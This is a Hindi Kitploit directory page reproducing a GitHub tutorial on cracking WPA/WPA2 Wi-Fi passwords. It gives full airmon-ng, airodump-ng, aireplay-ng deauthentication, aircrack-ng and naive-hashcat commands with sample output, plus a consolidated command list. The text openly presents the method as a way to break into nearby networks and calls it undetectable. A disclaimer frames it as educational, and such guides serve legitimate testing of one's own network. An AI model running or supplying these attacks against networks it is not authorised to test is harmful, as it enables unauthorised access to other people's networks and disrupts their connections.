Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wifi-cracking — Airodump-ng और Aircrack-ng/Hashcat के साथ WPA/WPA2 वाई-फाई राउटर को क्रैक करें | Kitploit
उपकरण/GitHubGitHub/brannondorsey/wifi-cracking
पासवर्ड क्रैकिंगवाई-फाई ऑडिटिंगलर्निंग और शिक्षा
GitHubbrannondorsey/wifi-cracking

wifi-cracking

Airodump-ng और Aircrack-ng/Hashcat के साथ WPA/WPA2 वाई-फाई राउटर को क्रैक करें

रिपॉजिटरी देखें
12.6k1.2k771 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

वाई-फाई क्रैकिंग

WPA/WPA2 वाई-फाई राउटर को Airodump-ng और Aircrack-ng/Hashcat से क्रैक करें।

यह एक संक्षिप्त वॉक-थ्रू ट्यूटोरियल है जो दर्शाता है कि कमजोर पासवर्ड वाले वाई-फाई नेटवर्क को कैसे क्रैक किया जाए। यह विस्तृत नहीं है, लेकिन यह आपके अपने नेटवर्क की सुरक्षा का परीक्षण करने या आस-पास के किसी नेटवर्क में घुसपैठ करने के लिए पर्याप्त जानकारी होनी चाहिए। नीचे बताया गया हमला पूरी तरह से निष्क्रिय है (केवल सुनना, आपके कंप्यूटर से कुछ प्रसारित नहीं होता) और इसका पता लगाना असंभव है, बशर्ते कि आप वास्तव में उस पासवर्ड का उपयोग न करें जिसे आप क्रैक करते हैं। एक वैकल्पिक सक्रिय डीऑथेंटिकेशन हमले का उपयोग टोही प्रक्रिया को तेज करने के लिए किया जा सकता है, जिसका वर्णन इस दस्तावेज़ के अंत में किया गया है।

यदि आप इस प्रक्रिया से परिचित हैं, तो आप विवरण छोड़ सकते हैं और सीधे नीचे उपयोग किए गए कमांड की सूची पर जा सकते हैं। विभिन्न सुझावों और वैकल्पिक तरीकों के लिए, परिशिष्ट देखें। neal1991 और tiiime ने भी कृपया इस दस्तावेज़ और परिशिष्ट का चीनी में अनुवाद प्रदान किया है यदि आप उन संस्करणों को पसंद करते हैं।

अस्वीकरण: यह सॉफ्टवेयर/ट्यूटोरियल केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग अवैध गतिविधि के लिए नहीं किया जाना चाहिए। लेखक इसके उपयोग के लिए जिम्मेदार नहीं है। बदमाश मत बनो।

आरंभ करना

यह ट्यूटोरियल मानता है कि आप:

  • कमांड-लाइन का उपयोग करने में सामान्य रूप से सहज हैं
  • डेबियन-आधारित लिनक्स डिस्ट्रो चला रहे हैं, अधिमानतः Kali linux (OSX उपयोगकर्ता परिशिष्ट देखें)
  • Aircrack-ng स्थापित है
    • sudo apt-get install aircrack-ng
  • एक वायरलेस कार्ड है जो मॉनिटर मोड का समर्थन करता है (समर्थित उपकरणों की सूची के लिए यहाँ देखें)

वाई-फाई नेटवर्क क्रैक करना

मॉनिटर मोड

मॉनिटर मोड का समर्थन करने वाले वायरलेस इंटरफेस को सूचीबद्ध करके शुरू करें:

root@kitploit:~
airmon-ng

यदि आपको कोई इंटरफ़ेस सूचीबद्ध नहीं दिखता है, तो आपका वायरलेस कार्ड मॉनिटर मोड का समर्थन नहीं करता है 😞

हम मान लेंगे कि आपका वायरलेस इंटरफ़ेस नाम wlan0 है, लेकिन यदि यह इससे भिन्न है तो सही नाम का उपयोग करना सुनिश्चित करें। इसके बाद, हम इंटरफ़ेस को मॉनिटर मोड में रखेंगे:

root@kitploit:~
airmon-ng start wlan0

iwconfig चलाएँ। अब आपको एक नया मॉनिटर मोड इंटरफ़ेस सूचीबद्ध दिखना चाहिए (संभवतः mon0 या wlan0mon)।

अपना लक्ष्य खोजें

अपने मॉनिटर इंटरफ़ेस का उपयोग करके आस-पास के वायरलेस राउटर द्वारा प्रसारित 802.11 बीकन फ्रेम को सुनना शुरू करें:

root@kitploit:~
airodump-ng mon0

आपको नीचे दिए गए समान आउटपुट दिखना चाहिए।

root@kitploit:~
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID			PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests                                                   
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8                                                          
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>                                                        
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro                                                          
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme                                                                 
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome                                                   
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2                                                                 
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2                                                          
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT                                                    
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root                                                                
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

इस डेमो के प्रयोजनों के लिए, हम अपने नेटवर्क "hackme" का पासवर्ड क्रैक करना चुनेंगे। airodump-ng द्वारा प्रदर्शित BSSID MAC पता और चैनल (CH) संख्या याद रखें, क्योंकि अगले चरण के लिए हमें दोनों की आवश्यकता होगी।

4-तरफ़ा हैंडशेक कैप्चर करें

WPA/WPA2 उपकरणों को नेटवर्क से प्रमाणित करने के लिए 4-तरफ़ा हैंडशेक का उपयोग करता है। आपको यह जानने की आवश्यकता नहीं है कि इसका क्या अर्थ है, लेकिन नेटवर्क पासवर्ड क्रैक करने के लिए आपको इनमें से एक हैंडशेक को कैप्चर करना होगा। ये हैंडशेक तब होते हैं जब कोई उपकरण नेटवर्क से कनेक्ट होता है, उदाहरण के लिए, जब आपका पड़ोसी काम से घर लौटता है। हम पिछले कमांड से प्राप्त चैनल और बीएसएसआईडी मानों का उपयोग करके लक्ष्य नेटवर्क पर ट्रैफ़िक की निगरानी के लिए airmon-ng को निर्देशित करके इस हैंडशेक को कैप्चर करते हैं।

root@kitploit:~
# -c और --bssid मानों को अपने लक्ष्य नेटवर्क के मानों से बदलें
# -w उस निर्देशिका को निर्दिष्ट करता है जहाँ हम पैकेट कैप्चर को सहेजेंगे
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
root@kitploit:~
 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]                                        
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS  

अब हम प्रतीक्षा करते हैं... एक बार जब आप एक हैंडशेक कैप्चर कर लेते हैं, तो आपको स्क्रीन के ऊपरी दाएं भाग में, वर्तमान समय के ठीक दाईं ओर कुछ इस तरह दिखना चाहिए [ WPA handshake: bc:d3:c9:ef:d2:67।

यदि आप अधीर महसूस कर रहे हैं, और सक्रिय हमले का उपयोग करने में सहज हैं, तो आप लक्ष्य नेटवर्क से जुड़े उपकरणों पर दुर्भावनापूर्ण डीऑथेंटिकेशन पैकेट भेजकर उन्हें पुनः कनेक्ट करने के लिए मजबूर कर सकते हैं। इसके परिणामस्वरूप अक्सर 4-तरफ़ा हैंडशेक कैप्चर हो जाता है। इसके बारे में जानकारी के लिए नीचे deauth attack section देखें।

एक बार जब आप एक हैंडशेक कैप्चर कर लेते हैं, तो airodump-ng से बाहर निकलने के लिए ctrl-c दबाएँ। आपको एक .cap फ़ाइल दिखनी चाहिए जहाँ भी आपने airodump-ng को कैप्चर सहेजने के लिए कहा था (संभवतः -01.cap कहा जाता है)। हम नेटवर्क पासवर्ड क्रैक करने के लिए इस कैप्चर फ़ाइल का उपयोग करेंगे। मैं इस फ़ाइल का नाम बदलकर उस नेटवर्क नाम को दर्शाना पसंद करता हूँ जिसे हम क्रैक करने का प्रयास कर रहे हैं:

root@kitploit:~
mv ./-01.cap hackme.cap

नेटवर्क पासवर्ड क्रैक करें

अंतिम चरण कैप्चर किए गए हैंडशेक का उपयोग करके पासवर्ड को क्रैक करना है। यदि आपके पास GPU तक पहुंच है, तो मैं पासवर्ड क्रैकिंग के लिए hashcat का उपयोग करने की अत्यधिक अनुशंसा करता हूँ। मैंने एक सरल टूल बनाया है जो hashcat का उपयोग करना बहुत आसान बनाता है जिसे naive-hashcat कहा जाता है। यदि आपके पास GPU तक पहुंच नहीं है, तो विभिन्न ऑनलाइन GPU क्रैकिंग सेवाएं हैं जिनका आप उपयोग कर सकते हैं, जैसे GPUHASH.me या OnlineHashCrack। आप Aircrack-ng के साथ CPU क्रैकिंग में भी अपना हाथ आजमा सकते हैं।

ध्यान दें कि नीचे दोनों हमले के तरीके अपेक्षाकृत कमजोर उपयोगकर्ता-जनित पासवर्ड मानते हैं। अधिकांश WPA/WPA2 राउटर मजबूत 12-अक्षर वाले यादृच्छिक पासवर्ड के साथ आते हैं जिन्हें कई उपयोगकर्ता (ठीक ही) अपरिवर्तित छोड़ देते हैं। यदि आप इनमें से किसी एक पासवर्ड को क्रैक करने का प्रयास कर रहे हैं, तो मैं Probable-Wordlists WPA-length डिक्शनरी फ़ाइलों का उपयोग करने की अनुशंसा करता हूँ।

naive-hashcat के साथ क्रैक करना (अनुशंसित)

naive-hashcat का उपयोग करके पासवर्ड क्रैक करने से पहले, हमें अपनी .cap फ़ाइल को समतुल्य हैशकैट फ़ाइल प्रारूप .hccapx में बदलना होगा। आप यह आसानी से .cap फ़ाइल को https://hashcat.net/cap2hccapx/ पर अपलोड करके या सीधे cap2hccapx टूल का उपयोग करके कर सकते हैं।

root@kitploit:~
cap2hccapx.bin hackme.cap hackme.hccapx

इसके बाद, naive-hashcat डाउनलोड करें और चलाएँ:

root@kitploit:~
# डाउनलोड
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# 134MB rockyou डिक्शनरी फ़ाइल डाउनलोड करें
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# क्रैक करें ! बेबी ! क्रैक करें !
# 2500 WPA/WPA2 के लिए हैशकैट हैश मोड है
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Naive-hashcat विभिन्न डिक्शनरी, रूल, कॉम्बिनेशन, और मास्क (स्मार्ट ब्रूट-फोर्स) हमलों का उपयोग करता है और मध्यम-शक्ति वाले पासवर्ड के खिलाफ चलने में दिन या महीने भी लग सकते हैं। क्रैक किया गया पासवर्ड hackme.pot में सहेजा जाएगा, इसलिए समय-समय पर इस फ़ाइल की जाँच करें। एक बार जब आप पासवर्ड क्रैक कर लेते हैं, तो आपको अपने POT_FILE की सामग्री के रूप में कुछ इस तरह दिखना चाहिए:

root@kitploit:~
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

जहाँ : द्वारा अलग किए गए अंतिम दो फ़ील्ड क्रमशः नेटवर्क नाम और पासवर्ड हैं।

यदि आप naive-hashcat के बिना hashcat का उपयोग करना चाहते हैं, तो जानकारी के लिए यह पृष्ठ देखें।

Aircrack-ng के साथ क्रैक करना

Aircrack-ng का उपयोग आपके CPU पर चलने वाले बहुत ही बुनियादी डिक्शनरी हमलों के लिए किया जा सकता है। हमले को चलाने से पहले आपको एक वर्डलिस्ट की आवश्यकता है। मैं कुख्यात rockyou डिक्शनरी फ़ाइल का उपयोग करने की अनुशंसा करता हूँ:

root@kitploit:~
# 134MB rockyou डिक्शनरी फ़ाइल डाउनलोड करें
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

ध्यान दें, यदि नेटवर्क पासवर्ड वर्डफ़ाइल में नहीं है, तो आप पासवर्ड क्रैक नहीं कर पाएंगे।

root@kitploit:~
# -a2 WPA2 निर्दिष्ट करता है, -b BSSID है, -w वर्डफ़ाइल है
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

यदि पासवर्ड क्रैक हो जाता है, तो आप टर्मिनल में KEY FOUND! संदेश देखेंगे, उसके बाद नेटवर्क पासवर्ड का सादा पाठ संस्करण दिखाई देगा।

root@kitploit:~
                                 Aircrack-ng 1.2 beta3


                   [00:01:49] 111040 keys tested (1017.96 k/s)


                         KEY FOUND! [ hacktheplanet ]


      Master Key     : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 
                       59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E 

      Transient Key  : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 
                       2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 
                       6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 
                       8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 

      EAPOL HMAC     : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4 

Deauth Attack

डीऑथ हमला आपकी मशीन से उस नेटवर्क से जुड़े क्लाइंट को नकली डीऑथेंटिकेशन पैकेट भेजता है जिसे आप क्रैक करने का प्रयास कर रहे हैं। इन पैकेटों में नकली "प्रेषक" पते शामिल होते हैं जो उन्हें क्लाइंट को ऐसा प्रतीत कराते हैं जैसे कि वे स्वयं एक्सेस प्वाइंट से भेजे गए हों। ऐसे पैकेट प्राप्त होने पर, अधिकांश क्लाइंट नेटवर्क से डिस्कनेक्ट हो जाते हैं और तुरंत पुनः कनेक्ट हो जाते हैं, जिससे आपको यदि आप airodump-ng के साथ सुन रहे हैं तो 4-तरफ़ा हैंडशेक मिल जाता है।

एक विशिष्ट एक्सेस प्वाइंट की निगरानी के लिए airodump-ng का उपयोग करें (-c channel --bssid MAC का उपयोग करके) जब तक आपको कोई क्लाइंट (STATION) कनेक्टेड न दिखे। एक कनेक्टेड क्लाइंट कुछ इस तरह दिखता है, जहाँ 64:BC:0C:48:97:F7 क्लाइंट MAC है।

root@kitploit:~
 CH  6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]                                         
                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  -19  75     1043      144   10   6  54e  WPA2 CCMP   PSK  ASUS                                                         
                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                 
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  64:BC:0C:48:97:F7  -37    1e- 1e     4     6479  ASUS

अब, airodump-ng को चालू रखें और एक नया टर्मिनल खोलें। हम अपने पीड़ित क्लाइंट को नकली डीऑथ पैकेट भेजने के लिए aireplay-ng कमांड का उपयोग करेंगे, जिससे वह नेटवर्क से पुनः कनेक्ट होने के लिए मजबूर हो जाएगा और उम्मीद है कि इस प्रक्रिया में एक हैंडशेक प्राप्त हो जाएगा।

root@kitploit:~
# -0 2 निर्दिष्ट करता है कि हम 2 डीऑथ पैकेट भेजना चाहते हैं। यदि आवश्यक हो तो इस संख्या को बढ़ाएँ,
# लेकिन ध्यान रखें कि इससे क्लाइंट नेटवर्क गतिविधि में ध्यान देने योग्य रुकावट आ सकती है
# -a एक्सेस प्वाइंट का MAC है
# -c क्लाइंट का MAC है
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

आप वैकल्पिक रूप से सभी कनेक्टेड क्लाइंट्स को डीऑथ पैकेट प्रसारित कर सकते हैं:

root@kitploit:~
# हालांकि सभी क्लाइंट प्रसारण डीऑथ का सम्मान नहीं करते हैं
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

एक बार जब आप डीऑथ पैकेट भेज देते हैं, तो अपने airodump-ng प्रक्रिया पर वापस जाएँ, और सौभाग्य से अब आपको ऊपरी दाएं कोने में कुछ इस तरह दिखना चाहिए: [ WPA handshake: 9C:5C:8E:C9:AB:C0। अब जब आपने एक हैंडशेक कैप्चर कर लिया है, तो आपको नेटवर्क पासवर्ड क्रैक करने के लिए तैयार होना चाहिए।

कमांड की सूची

नीचे WPA/WPA2 नेटवर्क को क्रैक करने के लिए आवश्यक सभी कमांड की सूची क्रम से दी गई है, न्यूनतम स्पष्टीकरण के साथ।

root@kitploit:~
# अपने नेटवर्क डिवाइस को मॉनिटर मोड में डालें
airmon-ng start wlan0

# लक्ष्य BSSID और चैनल प्राप्त करने के लिए सभी आस-पास के बीकन फ्रेम को सुनें
airodump-ng mon0

# हैंडशेक सुनना शुरू करें
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# वैकल्पिक रूप से हैंडशेक को बलपूर्वक प्राप्त करने के लिए किसी कनेक्टेड क्लाइंट को डीऑथ करें
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## aircrack-ng के साथ पासवर्ड क्रैक करें... ##########

# यदि आवश्यक हो तो 134MB rockyou.txt डिक्शनरी फ़ाइल डाउनलोड करें
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# aircrack-ng के साथ क्रैक करें
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## या naive-hashcat के साथ पासवर्ड क्रैक करें ##########

# cap को hccapx में बदलें
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# naive-hashcat के साथ क्रैक करें
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

परिशिष्ट

इस ट्यूटोरियल की प्रतिक्रिया इतनी शानदार रही कि मैंने समुदाय के सदस्यों से सुझाव और अतिरिक्त सामग्री को परिशिष्ट के रूप में जोड़ा है। यह जानने के लिए इसे देखें कि कैसे:

  • MacOS/OSX पर हैंडशेक कैप्चर करें और WPA पासवर्ड क्रैक करें
  • wlandump-ng के साथ अपने आस-पास के हर नेटवर्क से हैंडशेक कैप्चर करें
  • मौके पर 100+GB वर्डलिस्ट उत्पन्न करने के लिए crunch का उपयोग करें
  • macchanger के साथ अपने MAC पते को स्पूफ़ करें

परिशिष्ट का चीनी संस्करण भी उपलब्ध है।

श्रेय

यहाँ प्रस्तुत अधिकांश जानकारी Lewis Encarnacion के शानदार ट्यूटोरियल से ली गई थी। Aircrack-ng और Hashcat पर काम करने वाले शानदार लेखकों और अनुरक्षकों को भी धन्यवाद।

neal1991 और tiiime का इस ट्यूटोरियल का चीनी में अनुवाद करने के लिए अपार धन्यवाद। इसके अलावा yizhiheng, hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp और Shark0der को भी धन्यवाद जिन्होंने Reddit और GitHub पर सुझाव और टाइपो सुधार प्रदान किए। यदि आप WPA2 के कुछ प्रस्तावित विकल्पों के बारे में सुनने में रुचि रखते हैं, तो इस Hacker News पोस्ट पर कुछ बेहतरीन चर्चा देखें।

टूल डाउनलोड करें